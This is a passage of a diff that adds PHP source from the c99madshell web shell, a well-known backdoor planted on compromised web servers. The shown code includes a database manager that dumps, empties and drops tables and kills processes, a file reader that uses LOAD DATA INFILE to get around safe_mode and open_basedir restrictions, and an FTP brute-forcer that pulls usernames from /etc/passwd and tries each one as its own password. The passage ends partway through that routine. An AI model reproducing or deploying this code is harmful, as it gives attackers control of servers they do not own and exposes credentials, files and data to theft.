+ | echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; | ||
+ | } | ||
+ | } | ||
+ | else {echo "<b>Dump: nothing to do!</b>";} | ||
+ | } | ||
+ | } | ||
+ | if ($diplay) | ||
+ | { | ||
+ | if (!empty($sql_tbl)) | ||
+ | { | ||
+ | if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} | ||
+ | $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); | ||
+ | $count_row = mysql_fetch_array($count); | ||
+ | mysql_free_result($count); | ||
+ | $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); | ||
+ | $tbl_struct_fields = array(); | ||
+ | while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} | ||
+ | if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} | ||
+ | if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} | ||
+ | if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} | ||
+ | if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} | ||
+ | $perpage = $sql_tbl_le - $sql_tbl_ls; | ||
+ | if (!is_numeric($perpage)) {$perpage = 10;} | ||
+ | $numpages = $count_row[0]/$perpage; | ||
+ | $e = explode(" ",$sql_order); | ||
+ | if (count($e) == 2) | ||
+ | { | ||
+ | if ($e[0] == "d") {$asc_desc = "DESC";} | ||
+ | else {$asc_desc = "ASC";} | ||
+ | $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; | ||
+ | } | ||
+ | else {$v = "";} | ||
+ | $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; | ||
+ | $result = mysql_query($query) or print(mysql_smarterror()); | ||
+ | echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; | ||
+ | echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_act.value='structure';document.sql.submit();\">[ <b>Structure</b> ]</a> "; | ||
+ | echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_act.value='browse';document.sql.submit();\">[ <b>Browse</b> ]</a> "; | ||
+ | echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_act.value='tbldump';document.sql.thistbl.value='1';document.sql.submit();\">[ <b>Dump</b> ]</a> "; | ||
+ | echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_act.value='insert';document.sql.thistbl.value='1';document.sql.submit();\">[ <b>Insert</b> ]</a> "; | ||
+ | if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} | ||
+ | if ($sql_tbl_act == "insert") | ||
+ | { | ||
+ | if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} | ||
+ | if (!empty($sql_tbl_insert_radio)) | ||
+ | { | ||
+ | |||
+ | } | ||
+ | else | ||
+ | { | ||
+ | echo "<br><br><b>Inserting row into table:</b><br>"; | ||
+ | if (!empty($sql_tbl_insert_q)) | ||
+ | { | ||
+ | $sql_query = "SELECT * FROM `".$sql_tbl."`"; | ||
+ | $sql_query .= " WHERE".$sql_tbl_insert_q; | ||
+ | $sql_query .= " LIMIT 1;"; | ||
+ | $sql_query = urldecode($sql_query); | ||
+ | $sql_tbl_insert_q = urldecode($sql_tbl_insert_q); | ||
+ | $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); | ||
+ | $values = mysql_fetch_assoc($result); | ||
+ | mysql_free_result($result); | ||
+ | } | ||
+ | else {$values = array();} | ||
+ | echo "<form method=\"POST\"><input type=hidden name='sql_tbl_act' value='insert'><input type=hidden name='sql_tbl_insert_q' value='".urlencode($sql_tbl_insert_q)."'><input type=hidden name='sql_tbl_ls' value='".$sql_tbl_ls."'><input type=hidden name='sql_tbl_le' value='".$sql_tbl_le."'><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"act\" value=\"sql\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; | ||
+ | |||
+ | foreach ($tbl_struct_fields as $field) | ||
+ | { | ||
+ | $name = $field["Field"]; | ||
+ | if (empty($sql_tbl_insert_q)) {$v = "";} | ||
+ | echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; | ||
+ | $i++; | ||
+ | } | ||
+ | echo "</table><br>"; | ||
+ | echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; | ||
+ | if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} | ||
+ | echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; | ||
+ | } | ||
+ | } | ||
+ | if ($sql_tbl_act == "browse") | ||
+ | { | ||
+ | $sql_tbl_ls = abs($sql_tbl_ls); | ||
+ | $sql_tbl_le = abs($sql_tbl_le); | ||
+ | echo "<hr size=\"1\" noshade>"; | ||
+ | $b = 0; | ||
+ | for($i=0;$i<$numpages;$i++) | ||
+ | { | ||
+ | if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.thistbl.value='1';document.sql.sql_order.value='".htmlspecialchars($sql_order)."';document.sql.sql_tbl_ls.value='".($i*$perpage)."';document.sql.sql_tbl_le.value='".($i*$perpage+$perpage)."';document.sql.submit();\"><u>";} | ||
+ | echo $i; | ||
+ | if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} | ||
+ | if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} | ||
+ | else {echo " ";} | ||
+ | } | ||
+ | if ($i == 0) {echo "empty";} | ||
+ | echo "<form method=\"POST\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b> <input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\"> <b>To:</b> <input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\"> <input type=\"submit\" value=\"View\"></form>"; | ||
+ | echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>"; | ||
+ | echo "<tr>"; | ||
+ | echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; | ||
+ | for ($i=0;$i<mysql_num_fields($result);$i++) | ||
+ | { | ||
+ | $v = mysql_field_name($result,$i); | ||
+ | if ($e[0] == "a") {$s = "d"; $m = "asc";} | ||
+ | else {$s = "a"; $m = "desc";} | ||
+ | echo "<td>"; | ||
+ | if (empty($e[0])) {$e[0] = "a";} | ||
+ | if ($e[1] != $v) {$sql_order="";$sql_order=$e[0]." ".$v;echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_order.value='".$sql_order."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><b>".$v."</b></a>";} | ||
+ | else {echo "<b>".$v."</b> <a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_order.value='".$s."%20".$v."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><font color=red>\/</font></a>";} | ||
+ | echo "</td>"; | ||
+ | } | ||
+ | echo "<td><font color=\"green\"><b>Action</b></font></td>"; | ||
+ | echo "</tr>"; | ||
+ | while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) | ||
+ | { | ||
+ | echo "<tr>"; | ||
+ | $w = ""; | ||
+ | $i = 0; | ||
+ | foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} | ||
+ | if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} | ||
+ | echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; | ||
+ | $i = 0; | ||
+ | foreach ($row as $k=>$v) | ||
+ | { | ||
+ | $v = htmlspecialchars($v); | ||
+ | if ($v == "") {$v = "<font color=\"green\">NULL</font>";} | ||
+ | echo "<td>".$v."</td>"; | ||
+ | $i++; | ||
+ | } | ||
+ | echo "<td>"; | ||
+ | echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_act.value='query';document.sql.sql_query.value='".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><b>DEL</b></a> "; | ||
+ | echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl_act.value='insert';document.sql.sql_tbl_insert_q.value='".urlencode($w)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><b>EDIT</b></a> "; | ||
+ | echo "</td>"; | ||
+ | echo "</tr>"; | ||
+ | } | ||
+ | mysql_free_result($result); | ||
+ | echo "</table><hr size=\"1\" noshade><p align=\"left\"><select name=\"sql_act\">"; | ||
+ | echo "<option value=\"\">With selected:</option>"; | ||
+ | echo "<option value=\"deleterow\">Delete</option>"; | ||
+ | echo "</select> <input type=\"submit\" value=\"Confirm\"></form></p>"; | ||
+ | } | ||
+ | } | ||
+ | else | ||
+ | { | ||
+ | $result = mysql_query("SHOW TABLE STATUS", $sql_sock); | ||
+ | if (!$result) {echo mysql_smarterror();} | ||
+ | else | ||
+ | { | ||
+ | echo "<br><form method=\"POST\"><input name='act' type='hidden' value='sql'><input name='sql_login' type='hidden' value='".$sql_login."'><input name='sql_server' type='hidden' value='".$sql_server."'><input name='sql_port' type='hidden' value='".$sql_port."'><input name='sql_db' type='hidden' value='".$sql_db."'><input name='sql_passwd' type='hidden' value='".$sql_passwd."'><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; | ||
+ | $i = 0; | ||
+ | $tsize = $trows = 0; | ||
+ | while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) | ||
+ | { | ||
+ | $tsize += $row["Data_length"]; | ||
+ | $trows += $row["Rows"]; | ||
+ | $size = view_size($row["Data_length"]); | ||
+ | echo "<tr>"; | ||
+ | echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; | ||
+ | |||
+ | echo "<td> <a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($row["Name"])."';document.sql.submit();\"><b>".$row["Name"]."</b></a> </td>"; | ||
+ | echo "<td>".$row["Rows"]."</td>"; | ||
+ | echo "<td>".$row["Type"]."</td>"; | ||
+ | echo "<td>".$row["Create_time"]."</td>"; | ||
+ | echo "<td>".$row["Update_time"]."</td>"; | ||
+ | echo "<td>".$size."</td>"; | ||
+ | |||
+ | echo "<td> <a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_act.value='query';document.sql.sql_query.value='".urlencode("DELETE FROM `".$row["Name"]."`")."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.submit();\"><b>EMPT</b></a> <a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_act.value='query';document.sql.sql_query.value='".urlencode("DROP TABLE `".$row["Name"]."`")."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.submit();\"><b>DROP</b></a> <a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_tbl.value='".$row["Name"]."';document.sql.sql_tbl_act.value='insert';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.submit();\"><b>INS</b></a> </td>"; | ||
+ | echo "</tr>"; | ||
+ | $i++; | ||
+ | } | ||
+ | echo "<tr bgcolor=\"000000\">"; | ||
+ | echo "<td><center><b>»</b></center></td>"; | ||
+ | echo "<td><center><b>".$i." table(s)</b></center></td>"; | ||
+ | echo "<td><b>".$trows."</b></td>"; | ||
+ | echo "<td>".$row[1]."</td>"; | ||
+ | echo "<td>".$row[10]."</td>"; | ||
+ | echo "<td>".$row[11]."</td>"; | ||
+ | echo "<td><b>".view_size($tsize)."</b></td>"; | ||
+ | echo "<td></td>"; | ||
+ | echo "</tr>"; | ||
+ | echo "</table><hr size=\"1\" noshade><p align=\"right\"><select name=\"sql_act\">"; | ||
+ | echo "<option value=\"\">With selected:</option>"; | ||
+ | echo "<option value=\"tbldrop\">Drop</option>"; | ||
+ | echo "<option value=\"tblempty\">Empty</option>"; | ||
+ | echo "<option value=\"tbldump\">Dump</option>"; | ||
+ | echo "<option value=\"tblcheck\">Check table</option>"; | ||
+ | echo "<option value=\"tbloptimize\">Optimize table</option>"; | ||
+ | echo "<option value=\"tblrepair\">Repair table</option>"; | ||
+ | echo "<option value=\"tblanalyze\">Analyze table</option>"; | ||
+ | echo "</select> <input type=\"submit\" value=\"Confirm\"></form></p>"; | ||
+ | mysql_free_result($result); | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | else | ||
+ | { | ||
+ | $acts = array("","newdb","serverstatus","servervars","processes","getfile"); | ||
+ | if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20"> <input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>"> <input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } | ||
+ | if (!empty($sql_act)) | ||
+ | { | ||
+ | echo "<hr size=\"1\" noshade>"; | ||
+ | if ($sql_act == "newdb") | ||
+ | { | ||
+ | echo "<b>"; | ||
+ | if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} | ||
+ | else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} | ||
+ | } | ||
+ | if ($sql_act == "serverstatus") | ||
+ | { | ||
+ | $result = mysql_query("SHOW STATUS", $sql_sock); | ||
+ | echo "<center><b>Server-status variables:</b><br><br>"; | ||
+ | echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; | ||
+ | while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} | ||
+ | echo "</table></center>"; | ||
+ | mysql_free_result($result); | ||
+ | } | ||
+ | if ($sql_act == "servervars") | ||
+ | { | ||
+ | $result = mysql_query("SHOW VARIABLES", $sql_sock); | ||
+ | echo "<center><b>Server variables:</b><br><br>"; | ||
+ | echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; | ||
+ | while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} | ||
+ | echo "</table>"; | ||
+ | mysql_free_result($result); | ||
+ | } | ||
+ | if ($sql_act == "processes") | ||
+ | { | ||
+ | if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} | ||
+ | $result = mysql_query("SHOW PROCESSLIST", $sql_sock); | ||
+ | echo "<center><b>Processes:</b><br><br>"; | ||
+ | echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; | ||
+ | while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='processes';document.sql.kill.value='".$row[0]."';document.sql.submit();\"><u>Kill</u></a></td></tr>";} | ||
+ | echo "</table>"; | ||
+ | mysql_free_result($result); | ||
+ | } | ||
+ | if ($sql_act == "getfile") | ||
+ | { | ||
+ | $tmpdb = $sql_login."_tmpdb"; | ||
+ | $select = mysql_select_db($tmpdb); | ||
+ | if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} | ||
+ | if ($select) | ||
+ | { | ||
+ | $created = FALSE; | ||
+ | mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); | ||
+ | mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); | ||
+ | $result = mysql_query("SELECT * FROM tmp_file;"); | ||
+ | if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} | ||
+ | else | ||
+ | { | ||
+ | for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} | ||
+ | $f = ""; | ||
+ | while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} | ||
+ | if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} | ||
+ | else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} | ||
+ | mysql_free_result($result); | ||
+ | mysql_query("DROP TABLE tmp_file;"); | ||
+ | } | ||
+ | } | ||
+ | mysql_drop_db($tmpdb); //comment it if you want to leave database | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | echo "</td></tr></table>"; | ||
+ | if ($sql_sock) | ||
+ | { | ||
+ | $affected = @mysql_affected_rows($sql_sock); | ||
+ | if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} | ||
+ | echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; | ||
+ | } | ||
+ | echo "</table>"; | ||
+ | } | ||
+ | if ($act == "mkdir") | ||
+ | { | ||
+ | if ($mkdir != $d) | ||
+ | { | ||
+ | if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} | ||
+ | elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} | ||
+ | echo "<br><br>"; | ||
+ | } | ||
+ | $act = $dspact = "ls"; | ||
+ | } | ||
+ | if ($act == "ftpquickbrute") | ||
+ | { | ||
+ | echo "<b>Ftp Quick brute:</b><br>"; | ||
+ | if (!win) {echo "This functions not work in Windows!<br><br>";} | ||
+ | else | ||
+ | { | ||
+ | function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) | ||
+ | { | ||
+ | if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} | ||
+ | else {$TRUE = TRUE;} | ||
+ | if ($TRUE) | ||
+ | { | ||
+ | $sock = @ftp_connect($host,$port,$timeout); | ||
+ | if (@ftp_login($sock,$login,$pass)) | ||
+ | { | ||
+ | echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; | ||
+ | ob_flush(); | ||
+ | return TRUE; | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | if (!empty($submit)) | ||
+ | { | ||
+ | if (isset($_POST['fqb_lenght'])) $fqb_lenght = $_POST['fqb_lenght']; | ||
+ | if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} | ||
+ | $fp = fopen("/etc/passwd","r"); | ||
+ | if (!$fp) {echo "Can't get /etc/passwd for password-list.";} | ||
+ | else | ||
+ | { | ||
+ | if (isset($_POST['fqb_logging'])) $fqb_logging = $_POST['fqb_logging']; | ||
+ | if ($fqb_logging) | ||
+ | { | ||
+ | if (isset($_POST['fqb_logfile'])) $fqb_logging = $_POST['fqb_logfile']; | ||
+ | if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} | ||
+ | else {$fqb_logfp = FALSE;} | ||
+ | $fqb_log = "FTP Quick Brute (called c99madshell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; | ||
+ | if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} | ||
+ | } | ||
+ | ob_flush(); | ||
+ | $i = $success = 0; | ||
+ | $ftpquick_st = getmicrotime(); | ||
+ | while(!feof($fp)) | ||
+ | { | ||
+ | $str = explode(":",fgets($fp,2048)); | ||
+ | if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) | ||
+ | { | ||
+ | echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; | ||
+ | $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; | ||
+ | if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} | ||
+ | $success++; | ||
+ | ob_flush(); | ||
+ | } | ||
+ | if ($i > $fqb_lenght) {break;} | ||
+ | $i++; | ||
+ | } | ||
